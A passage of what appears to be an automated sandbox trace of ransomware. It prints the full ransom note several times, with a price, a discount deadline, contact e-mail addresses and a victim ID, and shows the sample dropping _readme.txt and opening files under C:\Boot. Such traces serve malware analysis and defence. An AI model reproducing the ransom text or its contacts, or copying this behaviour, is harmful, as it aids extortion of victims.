and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0184.145] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0184.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac5768 [0184.145] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\_readme.txt" (normalized: "c:\\boot\\pt-br\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0184.146] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac5768 | out: hHeap=0x2c0000) returned 1 [0184.146] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0184.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.147] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*" (normalized: "c:\\boot\\pt-br\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0184.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.147] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.147] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0184.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0184.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.148] PathFindExtensionW (pszPath="C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned=".mui" [0184.148] CreateFileW (lpFileName="C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0184.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0184.149] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0184.150] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0184.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0184.150] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0184.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0184.150] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0184.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.154] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.154] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0184.154] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.154] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0184.155] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.155] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.155] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.156] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.156] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0184.156] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0184.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0184.158] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.158] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.158] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.158] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0184.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0184.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0184.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0184.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0184.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0184.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0184.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.205] HeapFree (in: 